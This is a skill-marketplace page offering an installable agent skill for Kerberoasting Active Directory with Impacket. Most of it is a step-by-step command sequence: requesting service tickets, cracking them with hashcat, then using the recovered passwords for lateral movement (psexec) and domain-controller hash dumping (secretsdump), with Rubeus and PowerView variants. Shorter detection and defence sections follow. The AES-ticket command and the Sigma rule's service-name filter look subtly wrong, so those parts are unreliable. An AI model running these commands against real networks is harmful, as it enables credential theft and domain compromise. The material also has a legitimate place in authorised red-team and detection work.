seikaikyo/exploiting-kerberoasting-with-impacket
external/anthropic-cybersecurity-skills/skills/exploiting-kerberoasting-with-impacket/SKILL.md
Perform Kerberoasting attacks using Impacket's GetUserSPNs to extract and crack Kerberos TGS tickets for Active Directory service accounts.
$ install --global
skillsauthnpx skillsauth add seikaikyo/dash-skills exploiting-kerberoasting-with-impacketInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: May 14, 2026, 4:44 AM145.9s7 files scanned
SKILL.md
- name:
- exploiting-kerberoasting-with-impacket
- description:
- Perform Kerberoasting attacks using Impacket's GetUserSPNs to extract and crack Kerberos TGS tickets for Active
- domain:
- cybersecurity
- subdomain:
- red-teaming
- version:
- 1.0
- author:
- mahipal
- license:
- Apache-2.0
Exploiting Kerberoasting with Impacket
Overview
Kerberoasting (MITRE ATT&CK T1558.003) is a credential access technique that targets Active Directory service accounts by requesting Kerberos TGS (Ticket Granting Service) tickets for accounts with Service Principal Names (SPNs). The TGS ticket is encrypted with the service account's NTLM hash (RC4 or AES), enabling offline brute-force cracking. Impacket's GetUserSPNs.py is the standard tool for Linux-based Kerberoasting attacks.
When to Use
- When performing authorized security testing that involves exploiting kerberoasting with impacket
- When analyzing malware samples or attack artifacts in a controlled environment
- When conducting red team exercises or penetration testing engagements
- When building detection capabilities based on offensive technique understanding
Prerequisites
- Valid domain credentials (any domain user can request TGS tickets)
- Network access to a Domain Controller (TCP/88 Kerberos, TCP/389 LDAP)
- Impacket installed (
pip install impacket) - Hashcat or John the Ripper for offline cracking
- Wordlist (e.g., rockyou.txt, SecLists)
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
MITRE ATT&CK Mapping
| Technique ID | Name | Tactic | |---|---|---| | T1558.003 | Steal or Forge Kerberos Tickets: Kerberoasting | Credential Access | | T1087.002 | Account Discovery: Domain Account | Discovery | | T1110.002 | Brute Force: Password Cracking | Credential Access |
Step 1: Enumerate Kerberoastable Accounts
# List all user accounts with SPNs (without requesting tickets)
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1
# Output example:
# ServicePrincipalName Name MemberOf PasswordLastSet
# ---------------------------- ---------- -------------------------------- -------------------
# MSSQLSvc/SQL01.corp.local svc_sql CN=Domain Admins,CN=Users,... 2023-01-15 10:30:22
# HTTP/web01.corp.local svc_web CN=Web Admins,CN=Users,... 2024-03-20 14:15:00
# HOST/backup01.corp.local svc_backup CN=Backup Operators,CN=Users,... 2022-06-01 08:45:10
Step 2: Request TGS Tickets
# Request TGS tickets for all Kerberoastable accounts
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 -request
# Request ticket for a specific SPN
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
-request-user svc_sql
# Output format (hashcat-compatible):
# $krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/SQL01.corp.local*$abc123...
# Save to file for cracking
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
-request -outputfile kerberoast_hashes.txt
# Using NTLM hash instead of password (Pass-the-Hash)
GetUserSPNs.py corp.local/jsmith -hashes :aad3b435b51404eeaad3b435b51404ee \
-dc-ip 10.10.10.1 -request -outputfile hashes.txt
# Request AES tickets (if available)
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
-request -outputfile hashes.txt
Step 3: Crack TGS Tickets Offline
# Hashcat - RC4 encrypted tickets (mode 13100)
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt \
--rules-file /usr/share/hashcat/rules/best64.rule
# Hashcat - AES-256 encrypted tickets (mode 19700)
hashcat -m 19700 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
# John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast_hashes.txt
# Check results
hashcat -m 13100 kerberoast_hashes.txt --show
# $krb5tgs$23$*svc_sql$CORP.LOCAL$...*$...:Summer2024!
Step 4: Validate and Use Cracked Credentials
# Verify cracked credentials
crackmapexec smb 10.10.10.1 -u svc_sql -p 'Summer2024!' -d corp.local
# Check for local admin access
crackmapexec smb 10.10.10.0/24 -u svc_sql -p 'Summer2024!' -d corp.local --local-auth
# Use credentials for lateral movement
psexec.py corp.local/svc_sql:'Summer2024!'@SQL01.corp.local
# If service account is Domain Admin
secretsdump.py corp.local/svc_sql:'Summer2024!'@10.10.10.1 -just-dc-ntlm
Alternative Tools
Rubeus (Windows)
# Kerberoast all accounts
.\Rubeus.exe kerberoast /outfile:hashes.txt
# Target specific user
.\Rubeus.exe kerberoast /user:svc_sql /outfile:svc_sql_hash.txt
# Request RC4-only tickets (easier to crack)
.\Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt
# Kerberoast with AES
.\Rubeus.exe kerberoast /aes /outfile:hashes.txt
PowerView (PowerShell)
Import-Module .\PowerView.ps1
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File hashes.txt
Targeted Kerberoasting
High-value targets for Kerberoasting:
| Account Type | Why | Risk | |---|---|---| | Service accounts in Domain Admins | Direct path to domain compromise | Critical | | SQL service accounts (MSSQLSvc) | Often have excessive privileges | High | | Exchange service accounts | Access to all email | High | | Accounts with AdminCount=1 | Previously/currently privileged | High | | Accounts with old passwords | More likely to use weak passwords | Medium |
Detection
Windows Event Logs
Event ID 4769 - Kerberos Service Ticket Request
- Monitor for: Encryption type 0x17 (RC4-HMAC) when AES is expected
- Monitor for: Single user requesting many TGS tickets in short period
- Monitor for: Service ticket requests from unusual source IPs
Sigma Rule
title: Potential Kerberoasting Activity
status: stable
logsource:
product: windows
service: security
detection:
selection:
EventID: 4769
TicketEncryptionType: '0x17' # RC4
ServiceName|endswith: '$'
filter:
ServiceName: 'krbtgt'
condition: selection and not filter
level: medium
tags:
- attack.credential_access
- attack.t1558.003
Defensive Recommendations
- Use Group Managed Service Accounts (gMSA) - 240-character random passwords, auto-rotated
- Set strong passwords (25+ chars) on all service accounts
- Enable AES-only encryption - Disable RC4 via GPO
- Monitor Event ID 4769 for RC4 TGS requests
- Implement Managed Service Accounts where gMSA is not feasible
- Regular audits - Run BloodHound to identify Kerberoastable accounts
- Protected Users group - Add sensitive service accounts
- Honeypot SPNs - Create decoy accounts with SPNs to detect attacks
References
- MITRE ATT&CK T1558.003: https://attack.mitre.org/techniques/T1558/003/
- Impacket: https://github.com/fortra/impacket
- Harmj0y's Kerberoasting Revisited: https://posts.specterops.io/kerberoasting-revisited-d434351bd4d1
- Detection Strategy DET0157: https://attack.mitre.org/detectionstrategies/DET0157/
Related Skills
seikaikyo/implementing-zero-knowledge-proof-for-authentication
tools
VerifiedTrustedCommunity
Zero-Knowledge Proofs (ZKPs) allow a prover to demonstrate knowledge of a secret (such as a password or private key) without revealing the secret itself. This skill implements the Schnorr identificati
1SKILL.mdUpdated May 31, 2026
seikaikyo/implementing-web-application-logging-with-modsecurity
development
VerifiedTrustedCommunity
Configure ModSecurity WAF with OWASP Core Rule Set (CRS) for web application logging, tune rules to reduce false positives, analyze audit logs for attack detection, and implement custom SecRules for application-specific threats. The analyst configures SecRuleEngine, SecAuditEngine, and CRS paranoia levels to balance security coverage with operational stability. Activates for requests involving WAF configuration, ModSecurity rule tuning, web application audit logging, or CRS deployment.
1SKILL.mdUpdated May 31, 2026
seikaikyo/implementing-vulnerability-sla-breach-alerting
development
VerifiedTrustedCommunity
Build automated alerting for vulnerability remediation SLA breaches with severity-based timelines, escalation workflows, and compliance reporting dashboards.
1SKILL.mdUpdated May 31, 2026
seikaikyo/implementing-vulnerability-remediation-sla
testing
VerifiedTrustedCommunity
Vulnerability remediation SLAs define mandatory timeframes for patching or mitigating identified vulnerabilities based on severity, asset criticality, and exploit availability. Effective SLA programs
1SKILL.mdUpdated May 31, 2026